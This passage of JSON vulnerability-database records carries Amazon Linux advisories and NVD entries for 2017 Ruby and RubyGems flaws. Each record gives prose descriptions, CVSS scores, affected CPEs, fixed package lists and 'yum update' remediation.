([CVE-2017-0898 __](<https://access.redhat.com/security/cve/CVE-2017-0898>))\n\nEscape sequence in the \"summary\" field of gemspec \nRubyGems version 2.6.12 and earlier is vulnerable to maliciously crafted gem specifications that include terminal escape characters. Printing the gem specification would execute terminal escape sequences. ([CVE-2017-0899 __](<https://access.redhat.com/security/cve/CVE-2017-0899>))\n\nA vulnerability was found where the rubygems module was vulnerable to an unsafe YAML deserialization when inspecting a gem. Applications inspecting gem files without installing them can be tricked to execute arbitrary code in the context of the ruby interpreter. ([CVE-2017-0903 __](<https://access.redhat.com/security/cve/CVE-2017-0903>))\n\n \n**Affected Packages:** \n\n\nruby24\n\n \n**Issue Correction:** \nRun _yum update ruby24_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n rubygem24-bigdecimal-1.3.0-1.30.4.amzn1.i686 \n rubygem24-io-console-0.4.6-1.30.4.amzn1.i686 \n ruby24-devel-2.4.2-1.30.4.amzn1.i686 \n rubygem24-json-2.0.4-1.30.4.amzn1.i686 \n rubygem24-xmlrpc-0.2.1-1.30.4.amzn1.i686 \n rubygem24-psych-2.2.2-1.30.4.amzn1.i686 \n ruby24-debuginfo-2.4.2-1.30.4.amzn1.i686 \n ruby24-2.4.2-1.30.4.amzn1.i686 \n ruby24-libs-2.4.2-1.30.4.amzn1.i686 \n \n noarch: \n rubygem24-did_you_mean-1.1.0-1.30.4.amzn1.noarch \n rubygems24-2.6.13-1.30.4.amzn1.noarch \n rubygems24-devel-2.6.13-1.30.4.amzn1.noarch \n ruby24-irb-2.4.2-1.30.4.amzn1.noarch \n ruby24-doc-2.4.2-1.30.4.amzn1.noarch \n \n src: \n ruby24-2.4.2-1.30.4.amzn1.src \n \n x86_64: \n ruby24-devel-2.4.2-1.30.4.amzn1.x86_64 \n rubygem24-xmlrpc-0.2.1-1.30.4.amzn1.x86_64 \n rubygem24-json-2.0.4-1.30.4.amzn1.x86_64 \n rubygem24-bigdecimal-1.3.0-1.30.4.amzn1.x86_64 \n ruby24-2.4.2-1.30.4.amzn1.x86_64 \n ruby24-debuginfo-2.4.2-1.30.4.amzn1.x86_64 \n rubygem24-io-console-0.4.6-1.30.4.amzn1.x86_64 \n ruby24-libs-2.4.2-1.30.4.amzn1.x86_64 \n rubygem24-psych-2.2.2-1.30.4.amzn1.x86_64 \n \n \n", "edition": 5, "modified": "2017-10-26T17:01:00", "published": "2017-10-26T17:01:00", "id": "ALAS-2017-915", "href": "https://alas.aws.amazon.com/ALAS-2017-915.html", "title": "Medium: ruby24", "type": "amazon", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-10T12:34:56", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-0903", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", "CVE-2017-14033", "CVE-2015-9096", "CVE-2017-14064", "CVE-2017-0901"], "description": "**Issue Overview:**\n\nSMTP command injection via CRLF sequences in RCPT TO or MAIL FROM commands in Net::SMTP \nA SMTP command injection flaw was found in the way Ruby&#x27;s Net::SMTP module handled CRLF sequences in certain SMTP commands. An attacker could potentially use this flaw to inject SMTP commands in a SMTP session in order to facilitate phishing attacks or spam campaigns. ([CVE-2015-9096 __](<https://access.redhat.com/security/cve/CVE-2015-9096>))\n\nEscape sequence injection vulnerability in the Basic authentication of WEBrick \nThe Basic authentication code in WEBrick library in Ruby allows remote attackers to inject terminal emulator escape sequences into its log and possibly execute arbitrary commands via a crafted user name. ([CVE-2017-10784 __](<https://access.redhat.com/security/cve/CVE-2017-10784>))\n\nBuffer underrun in OpenSSL ASN1 decode \nThe decode method in the OpenSSL::ASN1 module in Ruby allows attackers to cause a denial of service (interpreter crash) via a crafted string. ([CVE-2017-14033 __](<https://access.redhat.com/security/cve/CVE-2017-14033>))\n\nNo size limit in summary length of gem spec \nRubyGems is vulnerable to maliciously crafted gem specifications to cause a denial of service attack against RubyGems clients who have issued a `query` command. ([CVE-2017-0900 __](<https://access.redhat.com/security/cve/CVE-2017-0900>))\n\nArbitrary file overwrite due to incorrect validation of specification name \nRubyGems fails to validate specification names, allowing a maliciously crafted gem to potentially overwrite any file on the filesystem. ([CVE-2017-0901 __](<https://access.redhat.com/security/cve/CVE-2017-0901>))\n\nDNS hijacking vulnerability \nRubyGems is vulnerable to a DNS hijacking vulnerability that allows a MITM attacker to force the RubyGems client to download and install gems from a server that the attacker controls. ([CVE-2017-0902 __](<https://access.redhat.com/security/cve/CVE-2017-0902>))\n\nBuffer underrun vulnerability in Kernel.sprintf \nRuby is vulnerable to a malicious format string which contains a precious specifier (*) with a huge minus value. Such situation can lead to a buffer overrun, resulting in a heap memory corruption or an information disclosure from the heap. ([CVE-2017-0898 __](<https://access.redhat.com/security/cve/CVE-2017-0898>))\n\nEscape sequence in the \"summary\" field of gemspec \nRubyGems is vulnerable to maliciously crafted gem specifications that include terminal escape characters. Printing the gem specification would execute terminal escape sequences. ([CVE-2017-0899 __](<https://access.redhat.com/security/cve/CVE-2017-0899>))\n\nArbitrary heap exposure during a JSON.generate call \nRuby can expose arbitrary memory during a JSON.generate call. The issues lies in using strdup in ext/json/ext/generator/generator.c, which will stop after encountering a &#x27;\\\\\\0&#x27; byte, returning a pointer to a string of length zero, which is not the length stored in space_len. ([CVE-2017-14064 __](<https://access.redhat.com/security/cve/CVE-2017-14064>))\n\nA vulnerability was found where the rubygems module was vulnerable to an unsafe YAML deserialization when inspecting a gem. Applications inspecting gem files without installing them can be tricked to execute arbitrary code in the context of the ruby interpreter. ([CVE-2017-0903 __](<https://access.redhat.com/security/cve/CVE-2017-0903>))\n\n \n**Affected Packages:** \n\n\nruby22, ruby23\n\n \n**Issue Correction:** \nRun _yum update ruby22_ to update your system. \nRun _yum update ruby23_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n ruby22-libs-2.2.8-1.9.amzn1.i686 \n rubygem22-psych-2.0.8.1-1.9.amzn1.i686 \n ruby22-debuginfo-2.2.8-1.9.amzn1.i686 \n ruby22-2.2.8-1.9.amzn1.i686 \n ruby22-devel-2.2.8-1.9.amzn1.i686 \n rubygem22-io-console-0.4.3-1.9.amzn1.i686 \n rubygem22-bigdecimal-1.2.6-1.9.amzn1.i686 \n rubygem23-psych-2.1.0.1-1.17.amzn1.i686 \n rubygem23-io-console-0.4.5-1.17.amzn1.i686 \n rubygem23-json-1.8.3.1-1.17.amzn1.i686 \n ruby23-devel-2.3.5-1.17.amzn1.i686 \n ruby23-debuginfo-2.3.5-1.17.amzn1.i686 \n ruby23-2.3.5-1.17.amzn1.i686 \n rubygem23-bigdecimal-1.2.8-1.17.amzn1.i686 \n ruby23-libs-2.3.5-1.17.amzn1.i686 \n \n noarch: \n ruby22-irb-2.2.8-1.9.amzn1.noarch \n rubygems22-devel-2.4.5.2-1.9.amzn1.noarch \n rubygems22-2.4.5.2-1.9.amzn1.noarch \n ruby22-doc-2.2.8-1.9.amzn1.noarch \n ruby23-doc-2.3.5-1.17.amzn1.noarch \n rubygem23-did_you_mean-1.0.0-1.17.amzn1.noarch \n rubygems23-devel-2.5.2.1-1.17.amzn1.noarch \n rubygems23-2.5.2.1-1.17.amzn1.noarch \n ruby23-irb-2.3.5-1.17.amzn1.noarch \n \n src: \n ruby22-2.2.8-1.9.amzn1.src \n ruby23-2.3.5-1.17.amzn1.src \n \n x86_64: \n ruby22-2.2.8-1.9.amzn1.x86_64 \n ruby22-devel-2.2.8-1.9.amzn1.x86_64 \n ruby22-debuginfo-2.2.8-1.9.amzn1.x86_64 \n rubygem22-bigdecimal-1.2.6-1.9.amzn1.x86_64 \n ruby22-libs-2.2.8-1.9.amzn1.x86_64 \n rubygem22-psych-2.0.8.1-1.9.amzn1.x86_64 \n rubygem22-io-console-0.4.3-1.9.amzn1.x86_64 \n rubygem23-json-1.8.3.1-1.17.amzn1.x86_64 \n ruby23-debuginfo-2.3.5-1.17.amzn1.x86_64 \n rubygem23-psych-2.1.0.1-1.17.amzn1.x86_64 \n ruby23-libs-2.3.5-1.17.amzn1.x86_64 \n ruby23-2.3.5-1.17.amzn1.x86_64 \n rubygem23-bigdecimal-1.2.8-1.17.amzn1.x86_64 \n rubygem23-io-console-0.4.5-1.17.amzn1.x86_64 \n ruby23-devel-2.3.5-1.17.amzn1.x86_64 \n \n \n", "edition": 6, "modified": "2017-10-02T17:01:00", "published": "2017-10-02T17:01:00", "id": "ALAS-2017-906", "href": "https://alas.aws.amazon.com/ALAS-2017-906.html", "title": "Medium: ruby22, ruby23", "type": "amazon", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2021-02-02T06:36:32", "description": "The Basic authentication code in WEBrick library in Ruby before 2.2.8, 2.3.x before 2.3.5, and 2.4.x through 2.4.1 allows remote attackers to inject terminal emulator escape sequences into its log and possibly execute arbitrary commands via a crafted user name.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-09-19T17:29:00", "title": "CVE-2017-10784", "type": "cve", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10784"], "modified": "2018-10-31T10:29:00", "cpe": ["cpe:/a:ruby-lang:ruby:2.3.0", "cpe:/a:ruby-lang:ruby:2.4.1", "cpe:/a:ruby-lang:ruby:2.3.1", "cpe:/a:ruby-lang:ruby:2.4.0", "cpe:/a:ruby-lang:ruby:2.3.4", "cpe:/a:ruby-lang:ruby:2.3.2", "cpe:/a:ruby-lang:ruby:2.2.7", "cpe:/a:ruby-lang:ruby:2.3.3"], "id": "CVE-2017-10784", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-10784", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:ruby-lang:ruby:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.0:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.0:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.0:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.0:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.0:preview1:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:36", "description": "Ruby through 2.2.7, 2.3.x through 2.3.4, and 2.4.x through 2.4.1 can expose arbitrary memory during a JSON.generate call. The issues lies in using strdup in ext/json/ext/generator/generator.c, which will stop after encountering a '\\0' byte, returning a pointer to a string of length zero, which is not the length stored in space_len.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-31T17:29:00", "title": "CVE-2017-14064", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-14064"], "modified": "2019-05-13T18:48:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/a:ruby-lang:ruby:2.3.0", "cpe:/a:ruby-lang:ruby:2.4.1", "cpe:/o:redhat:enterprise_linux_server_eus:7.4", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:redhat:enterprise_linux_server_tus:7.4", "cpe:/a:ruby-lang:ruby:2.3.1", "cpe:/a:ruby-lang:ruby:2.4.0", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.5", "cpe:/o:redhat:enterprise_linux_server_aus:7.4", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/a:ruby-lang:ruby:2.3.4", "cpe:/a:ruby-lang:ruby:2.3.2", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:ruby-lang:ruby:2.2.7", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/a:ruby-lang:ruby:2.3.3", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2017-14064", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14064", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.0:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.0:preview2:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.0:preview3:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.0:preview1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.0:preview1:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-02-02T06:36:36", "description": "The decode method in the OpenSSL::ASN1 module in Ruby before 2.2.8, 2.3.x before 2.3.5, and 2.4.x through 2.4.1 allows attackers to cause a denial of service (interpreter crash) via a crafted string.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-09-19T17:29:00", "title": "CVE-2017-14033", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-14033"], "modified": "2018-10-31T10:29:00", "cpe": ["cpe:/a:ruby-lang:ruby:2.3.0", "cpe:/a:ruby-lang:ruby:2.4.1", "cpe:/a:ruby-lang:ruby:2.2.5", "cpe:/a:ruby-lang:ruby:2.3.1", "cpe:/a:ruby-lang:ruby:2.4.0", "cpe:/a:ruby-lang:ruby:2.2.3", "cpe:/a:ruby-lang:ruby:2.3.4", "cpe:/a:ruby-lang:ruby:2.3.2", "cpe:/a:ruby-lang:ruby:2.2.1", "cpe:/a:ruby-lang:ruby:2.2.4", "cpe:/a:ruby-lang:ruby:2.2.0", "cpe:/a:ruby-lang:ruby:2.2.7", "cpe:/a:ruby-lang:ruby:2.2.2", "cpe:/a:ruby-lang:ruby:2.2.6", "cpe:/a:ruby-lang:ruby:2.3.3"], "id": "CVE-2017-14033", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14033", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ruby-lang:ruby:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.0:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.0:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.0:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.0:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.0:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.0:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.0:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.5:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:31", "description": "RubyGems version 2.6.12 and earlier fails to validate specification names, allowing a maliciously crafted gem to potentially overwrite any file on the filesystem.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-08-31T20:29:00", "title": "CVE-2017-0901", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0901"], "modified": "2019-10-09T23:21:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/o:redhat:enterprise_linux_server_eus:7.4", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:redhat:enterprise_linux_server_tus:7.4", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.5", "cpe:/o:redhat:enterprise_linux_server_aus:7.4", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/a:rubygems:rubygems:2.6.12", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2017-0901", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0901", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.6.12:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-02-02T06:36:31", "description": "RubyGems version 2.6.12 and earlier is vulnerable to maliciously crafted gem specifications to cause a denial of service attack against RubyGems clients who have issued a `query` command.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-08-31T20:29:00", "title": "CVE-2017-0900", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0900"], "modified": "2019-05-13T14:31:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/o:redhat:enterprise_linux_server_eus:7.4", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:redhat:enterprise_linux_server_tus:7.4", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.5", "cpe:/o:redhat:enterprise_linux_server_aus:7.4", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/a:rubygems:rubygems:2.6.12", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2017-0900", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0900", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.6.12:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:31", "description": "RubyGems version 2.6.12 and earlier is vulnerable to maliciously crafted gem specifications that include terminal escape characters. Printing the gem specification would execute terminal escape sequences.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": 